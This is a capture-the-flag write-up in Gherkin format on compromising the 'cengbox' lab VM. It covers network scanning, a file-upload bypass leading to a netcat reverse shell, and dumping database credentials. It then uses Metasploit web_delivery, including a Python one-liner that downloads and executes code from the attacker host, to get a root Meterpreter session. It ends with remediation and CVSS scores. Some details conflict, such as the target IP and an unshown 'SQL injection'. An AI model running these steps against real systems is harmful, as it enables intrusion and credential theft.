## Version 1.4.1
## language: en

Feature:
  TOE:
    cengbox
  Category:
    SQL Injection and privilege escalation
  Location:
    http://192.168.0.16:80
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
    REQ.040: The system must validate that the format (structure)
     of the files corresponds to its extension.
    REQ.041: The system must validate that the content of the files
     transferred to the same system is free of malicious code.
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Add type checks to restrict the uploadable file types

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Kali Linux        |  2020.3    |
    | Nmap              |  7.80      |
    | dirb              |  2.22      |
    | VirtualBox      | 6.1          |
    | Firefox         | 79.0         |
    | Metasploit      | 5.0.87-dev  |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-28 23:04 EDT
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.057s latency).
    Nmap scan report for 192.168.0.6 (192.168.0.6)
    Host is up (0.10s latency).
    Nmap scan report for 192.168.0.9 (192.168.0.9)
    Host is up (0.088s latency).
    Nmap scan report for cengbox (192.168.0.16)
    Host is up (0.0017s latency).
    Nmap done: 256 IP addresses (6 hosts up) scanned in 4.50 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.11
    And it has the ports 22 and 80 open
    """
    $ sudo nmap -sV -sS 192.168.0.16
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-28 23:05 EDT
    Nmap scan report for cengbox (192.168.0.16)
    Host is up (0.00066s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux;protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    MAC Address: 08:00:27:75:A6:13 (Oracle VirtualBox virtual NIC)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 7.97 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.16:80/
    And the cengbox homepage is displayed [evidences](02.png)
    Then the different shortcuts and buttons are validated
    And no vulnerability is shown [evidences](06.png)(07.png)(08.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the website does not show any vulnerabilities with the naked eye
    Then I proceeded to parse with dirb the directories on the server
    """
    $ dirb http://192.168.0.16:80/ /usr/share/wordlists/dirb/big.txt
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Mon Sep 28 23:14:47 2020
    URL_BASE: http://192.168.0.16:80/
    WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

    -----------------

    GENERATED WORDS: 20458

    ---- Scanning URL: http://192.168.0.16:80/ ----
    ==> DIRECTORY: http://192.168.0.16:80/css/
    ==> DIRECTORY: http://192.168.0.16:80/img/
    ==> DIRECTORY: http://192.168.0.16:80/js/
    ==> DIRECTORY: http://192.168.0.16:80/masteradmin/
    + http://192.168.0.16:80/server-status (CODE:403|SIZE:277)
    ==> DIRECTORY: http://192.168.0.16:80/uploads/
    ==> DIRECTORY: http://192.168.0.16:80/vendor/

    ---- Entering directory: http://192.168.0.16:80/css/ ----
    ---- Entering directory: http://192.168.0.16:80/img/ ----
    ---- Entering directory: http://192.168.0.16:80/js/ ----
    ---- Entering directory: http://192.168.0.16:80/masteradmin/ ----

    ==> DIRECTORY: http://192.168.0.16:80/masteradmin/css/
    ==> DIRECTORY: http://192.168.0.16:80/masteradmin/fonts/
    ==> DIRECTORY: http://192.168.0.16:80/masteradmin/images/
    ==> DIRECTORY: http://192.168.0.16:80/masteradmin/js/
    ==> DIRECTORY: http://192.168.0.16:80/masteradmin/vendor/

    ---- Entering directory: http://192.168.0.16:80/uploads/ ----

    ---- Entering directory: http://192.168.0.16:80/vendor/ ----
    ==> DIRECTORY: http://192.168.0.16:80/vendor/jquery/

    ---- Entering directory: http://192.168.0.16:80/masteradmin/css/ ----

    ---- Entering directory: http://192.168.0.16:80/masteradmin/fonts/ ----

    ---- Entering directory: http://192.168.0.16:80/masteradmin/images/ ----
    ==> DIRECTORY: http://192.168.0.16:80/masteradmin/images/icons/

    ---- Entering directory: http://192.168.0.16:80/masteradmin/js/ ----

    ---- Entering directory: http://192.168.0.16:80/masteradmin/vendor/ ----
    ==> DIRECTORY: http://192.168.0.16:80/masteradmin/vendor/jquery/

    ---- Entering directory: http://192.168.0.16:80/vendor/jquery/ ----

    ---- Entering directory: http://192.168.0.16:80/masteradmin/images/icons/

    ---- Entering directory: http://192.168.0.16:80/masteradmin/vendor/jquery/

    -----------------
    END_TIME: Mon Sep 28 23:30:07 2020
    DOWNLOADED: 306870 - FOUND: 2
    """
    Then I carefully checked the nmap report
    Given I access the site http://192.168.1.66:80/masteradmin/upload.php
    Then I see a message [evidences](03.png)
    """
    extension not allowed, please choose a CENG file.
    """
    Then you can be vulnerable by SQL Injection and unrestricted file upload

  Scenario: Exploitation
    Given the site is vulnerable to SQL Injection and unrestricted file upload
    Then the idea is to take advantage of vulnerability as a first validation
    And upload the file "revshell.php.ceng" [evidences](04.png)
    Then to use nc to listen to port 4444
    """
    nc -lvp 4444

    listening on [any] 4444 ...
    connect to [192.168.0.4] from cengbox [192.168.0.16] 54802
    Linux cengbox 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16 01:16:10 UTC
    20:29:15 up 16 min,  0 users,  load average: 0.07, 0.12, 0.20
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    """
    Given the vulnerability it is used Interactive Terminal Spawned via Python
    """
    $ python3 -c 'import pty; pty.spawn("/bin/bash")'
    www-data@cengbox:/$ cd home
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@cengbox:/$ cd /var/www/html/masteradmin
    cd /var/www/html/masteradmin
    www-data@cengbox:/var/www/html/masteradmin$ cat db.php
    cat db.php
    <?php
    $serverName = "localhost";
    $username = "root";
    $password = "SuperS3cR3TPassw0rd1!";
    $dbName = "cengbox";
    //Create Connection
    $conn = new mysqli($serverName, $username, $password,$dbName);
    //Check Connection
    if($conn->connect_error){
    die("Connection Failed: ".$conn->connect_error);
    } else { }
    ?>
    www-data@cengbox:/var/www/html/masteradmin$ mysql -u root -p
    mysql -u root -p
    Enter password: SuperS3cR3TPassw0rd1!
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 9
    Server version: 5.7.29-0ubuntu0.16.04.1 (Ubuntu)
    Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved
    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.
    Type 'help;' or '\h' for help. Type '\c' to clear the current input stateme
    mysql> show databases;
    show databases;
    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | cengbox            |
    | mysql              |
    | performance_schema |
    | sys                |
    +--------------------+
    5 rows in set (0.07 sec)
    mysql> use cengbox;
    use cengbox;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A
    Database changed
    mysql> show tables;
    mysql> show tables;
    show tables;
    +-------------------+
    | Tables_in_cengbox |
    +-------------------+
    | admin             |
    +-------------------+
    1 row in set (0.00 sec)
    mysql> select * from admin;
    select * from admin;
    +----+-------------+---------------+
    | id | username    | password      |
    +----+-------------+---------------+
    |  1 | masteradmin | C3ng0v3R00T1! |
    +----+-------------+---------------+
    1 row in set (0.00 sec)
    """
    Given the password, authentication is performed on the system
    """
    nc -lvp 4444
    listening on [any] 4444 ...
    connect to [192.168.0.4] from cengbox [192.168.0.16] 54802
    Linux cengbox 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16 01:16:10 UTC
    20:29:15 up 16 min,  0 users,  load average: 0.07, 0.12, 0.20
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ python3 -c 'import pty; pty.spawn("/bin/bash")'
    www-data@cengbox:/$ cd home
    www-data@cengbox:/home$ su cengover
    su cengover
    Password: C3ng0v3R00T1!
    """
    Given the /opt path the content is validated
    And your files are listed
    """
    cengover@cengbox:~$ cd /opt
    cengover@cengbox:/opt$ ls -al
    ls -al
    total 12
    drwxr-xr-x  2 root root  4096 Apr 28 13:35
    drwxr-xr-x 23 root root  4096 Apr 26 13:28
    -rw-rw----  1 root users  213 Sep 30 04:00 md5check.py
    """
    Given the md5check.py file the permissions are validated
    And only read permissions are shown
    Then you proceed to escalate privileges through metasploit
    """
    msfconsole
    =[ metasploit v5.0.99-dev                          ]
    + -- --=[ 2045 exploits - 1106 auxiliary - 344 post       ]
    + -- --=[ 562 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 7 evasion                                       ]
    Metasploit tip: You can upgrade a shell to a Meterpreter session on many
    msf5 use exploit/multi/script/web_delivery
    [*] Using configured payload python/meterpreter/reverse_tcp
    msf5 exploit(multi/script/web_delivery) > set lhost 192.168.0.4
    lhost => 192.168.0.4
    msf5 exploit(multi/script/web_delivery) > set lport 4567
    lport => 4567
    msf5 exploit(multi/script/web_delivery) > exploit
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.
    msf5 exploit(multi/script/web_delivery) >
    [*] Started reverse TCP handler on 192.168.0.4:4567
    [*] Using URL: http://0.0.0.0:8080/X5wMMcM
    [*] Local IP: http://192.168.0.4:8080/X5wMMcM
    [*] Server started.
    [*] Run the following command on the target machine:
    python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}
    [sys.version_info[0]],fromlist=('urlopen',));
    r=u.urlopen('http://192.168.0.4:8080/X5wMMcM',
    context=ssl._create_unverified_context());exec(r.read());"
    msf5 exploit(multi/script/web_delivery) >
    [*] 192.168.0.16     web_delivery - Delivering Payload (433 bytes)
    [*] Sending stage (53755 bytes) to 192.168.0.16
    [*] Meterpreter session 1 opened (192.168.0.4:4567 -> 192.168.0.16:56044)
    at 2020-09-29 21:00:56 -0400
    msf5 exploit(multi/script/web_delivery) > sessions -i 1
    [*] Starting interaction with 1...
    meterpreter > sysinfo
    Computer        : cengbox
    OS              : Linux 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16
    Architecture    : x64
    System Language : en_US
    Meterpreter     : python/linux
    meterpreter > ls -al
    Listing: /root
    ==============
    Mode              Size   Type  Last modified              Name
    ----              ----   ----  -------------              ----
    100600/rw-------  5      fil   2020-04-29 11:50:28 -0400  .bash_history
    100644/rw-r--r--  3106   fil   2020-04-25 15:51:03 -0400  .bashrc
    40755/rwxr-xr-x   4096   dir   2020-04-26 06:30:38 -0400  .nano
    100644/rw-r--r--  148    fil   2020-04-25 15:51:03 -0400  .profile
    100644/rw-r--r--  66     fil   2020-04-28 06:48:09 -0400  .selected_editor
    100600/rw-------  5362   fil   2020-04-29 11:50:19 -0400  .viminfo
    100644/rw-r--r--  13359  fil   2020-09-29 14:16:01 -0400  note.txt
    100644/rw-r--r--  420    fil   2020-04-29 11:50:19 -0400  root.txt
    """
    Given the new privileges on the root.txt
    Then the flag is read [evidences](05.png)

  Scenario: Remediation
    Given The website is vulnerable loaded files
    When The website is upload a file
    Then The file extensions must be verified
    """
    $allowed = array('gif', 'png', 'jpg');
    $filename = $_FILES['image']['name'];
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    if (!in_array($ext, $allowed)) {
      echo 'error';
    }
    """
    And The website could be shielded against files with dangerous type

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      8.1/10 (High) - AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environmen
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-09-29
